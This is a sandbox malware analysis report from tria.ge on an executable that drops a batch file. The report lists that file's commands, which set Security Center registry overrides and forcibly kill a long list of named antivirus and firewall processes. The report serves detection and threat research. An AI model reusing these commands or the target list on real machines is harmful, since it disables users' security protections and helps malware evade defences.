Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
71s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
03/12/2022, 07:58
Behavioral task
behavioral1
Sample
5247ccedc9744c5c25eb13c036b48cffadde1f804372fc60f43c4d1d4abb879e.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
5247ccedc9744c5c25eb13c036b48cffadde1f804372fc60f43c4d1d4abb879e.exe
Resource
win10v2004-20221111-en
General
-
Target
5247ccedc9744c5c25eb13c036b48cffadde1f804372fc60f43c4d1d4abb879e.exe
-
Size
13KB
-
MD5
d5c5f9a8736c119ed87dfc7661d0cc24
-
SHA1
790eac77fd7d51ac19c36a35afa89ae8492e9b16
-
SHA256
5247ccedc9744c5c25eb13c036b48cffadde1f804372fc60f43c4d1d4abb879e
-
SHA512
7b0464eb27ea0277b776ad073cca8fed50c4d2b39d2d4fe7fc6f04c62af282f6fa1dbdbc6f9af5cbba0d68bc03b6fa4e9642f007508a15cae6ecd21544143426
-
SSDEEP
192:tfx1/biSj4MLsQ2BX13AakSvUkt7KeBDTdiPdP6lTDQc2nFaNJhLkwcud2DH9Vw9:tfxnT2BX1JNVjKVK2FaNJawcudoD7Ub
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "4" reg.exe -
Executes dropped EXE 1 IoCs
pid Process 1180 b2e.exe -
resource yara_rule behavioral1/memory/1724-59-0x0000000000400000-0x0000000000417000-memory.dmp upx -
Loads dropped DLL 2 IoCs
pid Process 1724 5247ccedc9744c5c25eb13c036b48cffadde1f804372fc60f43c4d1d4abb879e.exe 1724 5247ccedc9744c5c25eb13c036b48cffadde1f804372fc60f43c4d1d4abb879e.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 64 IoCs
pid Process 1476 taskkill.exe 1724 taskkill.exe 1988 taskkill.exe 952 taskkill.exe 1432 taskkill.exe 604 taskkill.exe 1320 taskkill.exe 892 taskkill.exe 996 taskkill.exe 1000 taskkill.exe 1704 taskkill.exe 1640 taskkill.exe 1072 taskkill.exe 1476 taskkill.exe 864 taskkill.exe 1680 taskkill.exe 1320 taskkill.exe 1988 taskkill.exe 924 taskkill.exe 1836 taskkill.exe 1544 taskkill.exe 1724 taskkill.exe 308 taskkill.exe 756 taskkill.exe 1000 taskkill.exe 2000 taskkill.exe 1600 taskkill.exe 1808 taskkill.exe 1676 taskkill.exe 1088 taskkill.exe 1108 taskkill.exe 560 taskkill.exe 1516 taskkill.exe 392 taskkill.exe 1208 taskkill.exe 848 taskkill.exe 1000 taskkill.exe 1608 taskkill.exe 1568 taskkill.exe 1412 taskkill.exe 1292 taskkill.exe 1412 taskkill.exe 1632 taskkill.exe 1532 taskkill.exe 1000 taskkill.exe 1820 taskkill.exe 2016 taskkill.exe 1776 taskkill.exe 1220 taskkill.exe 308 taskkill.exe 552 taskkill.exe 1548 taskkill.exe 1320 taskkill.exe 316 taskkill.exe 1608 taskkill.exe 604 taskkill.exe 1916 taskkill.exe 1088 taskkill.exe 684 taskkill.exe 1548 taskkill.exe 1924 taskkill.exe 1704 taskkill.exe 1540 taskkill.exe 1120 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 692 PING.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 756 taskkill.exe Token: SeDebugPrivilege 1536 taskkill.exe Token: SeDebugPrivilege 824 taskkill.exe Token: SeDebugPrivilege 1532 taskkill.exe Token: SeDebugPrivilege 1668 taskkill.exe Token: SeDebugPrivilege 1204 taskkill.exe Token: SeDebugPrivilege 1808 taskkill.exe Token: SeDebugPrivilege 1968 taskkill.exe Token: SeDebugPrivilege 1676 taskkill.exe Token: SeDebugPrivilege 1212 taskkill.exe Token: SeDebugPrivilege 1660 taskkill.exe Token: SeDebugPrivilege 1632 taskkill.exe Token: SeDebugPrivilege 536 taskkill.exe Token: SeDebugPrivilege 1764 taskkill.exe Token: SeDebugPrivilege 2032 taskkill.exe Token: SeDebugPrivilege 316 taskkill.exe Token: SeDebugPrivilege 1828 taskkill.exe Token: SeDebugPrivilege 1688 taskkill.exe Token: SeDebugPrivilege 324 taskkill.exe Token: SeDebugPrivilege 692 taskkill.exe Token: SeDebugPrivilege 2012 taskkill.exe Token: SeDebugPrivilege 1924 taskkill.exe Token: SeDebugPrivilege 1472 taskkill.exe Token: SeDebugPrivilege 1972 taskkill.exe Token: SeDebugPrivilege 1528 taskkill.exe Token: SeDebugPrivilege 772 taskkill.exe Token: SeDebugPrivilege 1060 taskkill.exe Token: SeDebugPrivilege 1660 taskkill.exe Token: SeDebugPrivilege 1632 taskkill.exe Token: SeDebugPrivilege 536 taskkill.exe Token: SeDebugPrivilege 1188 taskkill.exe Token: SeDebugPrivilege 1292 taskkill.exe Token: SeDebugPrivilege 1776 taskkill.exe Token: SeDebugPrivilege 1140 taskkill.exe Token: SeDebugPrivilege 1520 taskkill.exe Token: SeDebugPrivilege 848 taskkill.exe Token: SeDebugPrivilege 1028 taskkill.exe Token: SeDebugPrivilege 1100 taskkill.exe Token: SeDebugPrivilege 1916 taskkill.exe Token: SeDebugPrivilege 1728 taskkill.exe Token: SeDebugPrivilege 1984 taskkill.exe Token: SeDebugPrivilege 1652 taskkill.exe Token: SeDebugPrivilege 1608 taskkill.exe Token: SeDebugPrivilege 1468 taskkill.exe Token: SeDebugPrivilege 544 taskkill.exe Token: SeDebugPrivilege 308 taskkill.exe Token: SeDebugPrivilege 1764 taskkill.exe Token: SeDebugPrivilege 1128 taskkill.exe Token: SeDebugPrivilege 2036 taskkill.exe Token: SeDebugPrivilege 560 taskkill.exe Token: SeDebugPrivilege 1948 taskkill.exe Token: SeDebugPrivilege 2016 taskkill.exe Token: SeDebugPrivilege 1520 taskkill.exe Token: SeDebugPrivilege 848 taskkill.exe Token: SeDebugPrivilege 1028 taskkill.exe Token: SeDebugPrivilege 1100 taskkill.exe Token: SeDebugPrivilege 1916 taskkill.exe Token: SeDebugPrivilege 1728 taskkill.exe Token: SeDebugPrivilege 1984 taskkill.exe Token: SeDebugPrivilege 1652 taskkill.exe Token: SeDebugPrivilege 1608 taskkill.exe Token: SeDebugPrivilege 604 taskkill.exe Token: SeDebugPrivilege 1504 taskkill.exe Token: SeDebugPrivilege 1632 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1724 wrote to memory of 1180 1724 5247ccedc9744c5c25eb13c036b48cffadde1f804372fc60f43c4d1d4abb879e.exe 27 PID 1724 wrote to memory of 1180 1724 5247ccedc9744c5c25eb13c036b48cffadde1f804372fc60f43c4d1d4abb879e.exe 27 PID 1724 wrote to memory of 1180 1724 5247ccedc9744c5c25eb13c036b48cffadde1f804372fc60f43c4d1d4abb879e.exe 27 PID 1724 wrote to memory of 1180 1724 5247ccedc9744c5c25eb13c036b48cffadde1f804372fc60f43c4d1d4abb879e.exe 27 PID 1180 wrote to memory of 1720 1180 b2e.exe 28 PID 1180 wrote to memory of 1720 1180 b2e.exe 28 PID 1180 wrote to memory of 1720 1180 b2e.exe 28 PID 1180 wrote to memory of 1720 1180 b2e.exe 28 PID 1720 wrote to memory of 756 1720 cmd.exe 30 PID 1720 wrote to memory of 756 1720 cmd.exe 30 PID 1720 wrote to memory of 756 1720 cmd.exe 30 PID 1720 wrote to memory of 756 1720 cmd.exe 30 PID 1720 wrote to memory of 1536 1720 cmd.exe 32 PID 1720 wrote to memory of 1536 1720 cmd.exe 32 PID 1720 wrote to memory of 1536 1720 cmd.exe 32 PID 1720 wrote to memory of 1536 1720 cmd.exe 32 PID 1720 wrote to memory of 824 1720 cmd.exe 33 PID 1720 wrote to memory of 824 1720 cmd.exe 33 PID 1720 wrote to memory of 824 1720 cmd.exe 33 PID 1720 wrote to memory of 824 1720 cmd.exe 33 PID 1720 wrote to memory of 1532 1720 cmd.exe 34 PID 1720 wrote to memory of 1532 1720 cmd.exe 34 PID 1720 wrote to memory of 1532 1720 cmd.exe 34 PID 1720 wrote to memory of 1532 1720 cmd.exe 34 PID 1720 wrote to memory of 1668 1720 cmd.exe 35 PID 1720 wrote to memory of 1668 1720 cmd.exe 35 PID 1720 wrote to memory of 1668 1720 cmd.exe 35 PID 1720 wrote to memory of 1668 1720 cmd.exe 35 PID 1720 wrote to memory of 1204 1720 cmd.exe 36 PID 1720 wrote to memory of 1204 1720 cmd.exe 36 PID 1720 wrote to memory of 1204 1720 cmd.exe 36 PID 1720 wrote to memory of 1204 1720 cmd.exe 36 PID 1720 wrote to memory of 1808 1720 cmd.exe 37 PID 1720 wrote to memory of 1808 1720 cmd.exe 37 PID 1720 wrote to memory of 1808 1720 cmd.exe 37 PID 1720 wrote to memory of 1808 1720 cmd.exe 37 PID 1720 wrote to memory of 1968 1720 cmd.exe 38 PID 1720 wrote to memory of 1968 1720 cmd.exe 38 PID 1720 wrote to memory of 1968 1720 cmd.exe 38 PID 1720 wrote to memory of 1968 1720 cmd.exe 38 PID 1720 wrote to memory of 1676 1720 cmd.exe 39 PID 1720 wrote to memory of 1676 1720 cmd.exe 39 PID 1720 wrote to memory of 1676 1720 cmd.exe 39 PID 1720 wrote to memory of 1676 1720 cmd.exe 39 PID 1720 wrote to memory of 1212 1720 cmd.exe 40 PID 1720 wrote to memory of 1212 1720 cmd.exe 40 PID 1720 wrote to memory of 1212 1720 cmd.exe 40 PID 1720 wrote to memory of 1212 1720 cmd.exe 40 PID 1720 wrote to memory of 1660 1720 cmd.exe 41 PID 1720 wrote to memory of 1660 1720 cmd.exe 41 PID 1720 wrote to memory of 1660 1720 cmd.exe 41 PID 1720 wrote to memory of 1660 1720 cmd.exe 41 PID 1720 wrote to memory of 1632 1720 cmd.exe 42 PID 1720 wrote to memory of 1632 1720 cmd.exe 42 PID 1720 wrote to memory of 1632 1720 cmd.exe 42 PID 1720 wrote to memory of 1632 1720 cmd.exe 42 PID 1720 wrote to memory of 536 1720 cmd.exe 43 PID 1720 wrote to memory of 536 1720 cmd.exe 43 PID 1720 wrote to memory of 536 1720 cmd.exe 43 PID 1720 wrote to memory of 536 1720 cmd.exe 43 PID 1720 wrote to memory of 1764 1720 cmd.exe 44 PID 1720 wrote to memory of 1764 1720 cmd.exe 44 PID 1720 wrote to memory of 1764 1720 cmd.exe 44 PID 1720 wrote to memory of 1764 1720 cmd.exe 44
Processes
-
C:\Users\Admin\AppData\Local\Temp\5247ccedc9744c5c25eb13c036b48cffadde1f804372fc60f43c4d1d4abb879e.exe"C:\Users\Admin\AppData\Local\Temp\5247ccedc9744c5c25eb13c036b48cffadde1f804372fc60f43c4d1d4abb879e.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Users\Admin\AppData\Local\Temp\159.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\159.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\159.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\5247ccedc9744c5c25eb13c036b48cffadde1f804372fc60f43c4d1d4abb879e.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\2A0.tmp\batfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nod32krn.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:756
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nod32.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nod32kui.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:824
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im kav.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1532
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im kavmm.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im KAVPF.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1204
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgemc.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgcc.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgamsvr.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgupsvc.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1212
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgw.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ashWebSv.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ashDisp.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:536
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ashmaisv.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ashserv.exe4⤵PID:1604
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im aswupdsv.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ewidoctrl.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:316
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im guard.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1828
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im gcasDtServ.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im MsMpEng.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:324
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mcafee.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:692
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mghtml.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im MsiExec.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im outpost.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1472
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im isafe.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zapro.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zauinst.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:772
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im UpdClient.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1060
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zlcliente.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im minilog.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zonealarm.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:536
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zlclient.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1188
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ccapp.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1292
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ccsetmgr.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ccevtmgr.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1140
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Norton Auto-Protect.exe4⤵
- Kills process with taskkill
PID:2016
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cccproxy.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im navw32.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:848
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im norton.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im navapsvc.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im npfmntor.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1916
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im logexprt.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nisum.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im issvc.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cpdclnt.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pccntupd.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im PCCTool.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tmproxy.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:308
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tmntsrv.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pop3trap.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1128
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tsc.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im PavPrSrv.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:560
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im padmin.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im PavProt.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pandaav.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avengine.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:848
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im apvxdwin.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im webProxy.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avguard.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1916
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgnt.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sched.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avsched32.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SCCOMM.EXE4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Spiderml.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:604
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vsserv.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1504
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im bdswitch.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im bdss.exe4⤵PID:536
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im INOTask.exe4⤵PID:880
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im caissdt.exe4⤵
- Kills process with taskkill
PID:684
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im InoRpc.exe4⤵PID:1496
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im VetMsg.exe4⤵PID:560
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vettray.exe4⤵PID:540
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im realmon.exe4⤵PID:624
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nod32krn.exe4⤵PID:1668
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nod32.exe4⤵PID:1208
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nod32kui.exe4⤵PID:2012
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im kav.exe4⤵PID:1732
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im kavmm.exe4⤵PID:1968
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im KAVPF.exe4⤵
- Kills process with taskkill
PID:1916
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgemc.exe4⤵PID:1640
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgcc.exe4⤵PID:1108
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgamsvr.exe4⤵PID:1624
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgupsvc.exe4⤵PID:1168
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgw.exe4⤵PID:1056
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ashWebSv.exe4⤵PID:1752
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ashDisp.exe4⤵PID:952
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ashmaisv.exe4⤵PID:2000
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ashserv.exe4⤵PID:1188
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im aswupdsv.exe4⤵PID:316
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ewidoctrl.exe4⤵PID:1828
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im guard.exe4⤵PID:1300
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im gcasDtServ.exe4⤵
- Kills process with taskkill
PID:1432
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im MsMpEng.exe4⤵PID:2016
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mcafee.exe4⤵PID:856
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mghtml.exe4⤵PID:1204
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im MsiExec.exe4⤵PID:1808
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im outpost.exe4⤵PID:2008
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im isafe.exe4⤵PID:1820
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zapro.exe4⤵PID:1676
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zauinst.exe4⤵PID:1212
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im UpdClient.exe4⤵PID:1984
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zlcliente.exe4⤵PID:1652
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im minilog.exe4⤵PID:1608
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zonealarm.exe4⤵
- Kills process with taskkill
PID:604
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zlclient.exe4⤵PID:1504
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ccapp.exe4⤵PID:1124
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ccsetmgr.exe4⤵PID:1416
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ccevtmgr.exe4⤵PID:900
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Norton Auto-Protect.exe4⤵PID:1724
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cccproxy.exe4⤵PID:316
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im navw32.exe4⤵PID:1828
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im norton.exe4⤵PID:1536
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im navapsvc.exe4⤵PID:980
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im npfmntor.exe4⤵PID:864
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im logexprt.exe4⤵PID:1520
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nisum.exe4⤵PID:1476
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im issvc.exe4⤵PID:928
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cpdclnt.exe4⤵PID:2008
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pccntupd.exe4⤵PID:1820
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im PCCTool.exe4⤵PID:1676
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tmproxy.exe4⤵PID:1212
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tmntsrv.exe4⤵PID:1984
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pop3trap.exe4⤵PID:1652
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tsc.exe4⤵PID:1608
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im PavPrSrv.exe4⤵PID:604
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im padmin.exe4⤵PID:1504
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im PavProt.exe4⤵PID:1632
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pandaav.exe4⤵PID:2036
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avengine.exe4⤵PID:1776
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im apvxdwin.exe4⤵PID:1072
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im webProxy.exe4⤵PID:1088
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avguard.exe4⤵PID:540
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgnt.exe4⤵PID:1412
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sched.exe4⤵PID:1928
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avsched32.exe4⤵PID:1516
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SCCOMM.EXE4⤵PID:1920
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Spiderml.exe4⤵PID:1596
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vsserv.exe4⤵PID:1784
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im bdswitch.exe4⤵PID:1836
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im bdss.exe4⤵PID:828
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im INOTask.exe4⤵PID:1320
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im caissdt.exe4⤵PID:1624
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im InoRpc.exe4⤵PID:1660
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im VetMsg.exe4⤵PID:2020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vettray.exe4⤵PID:1752
-
-
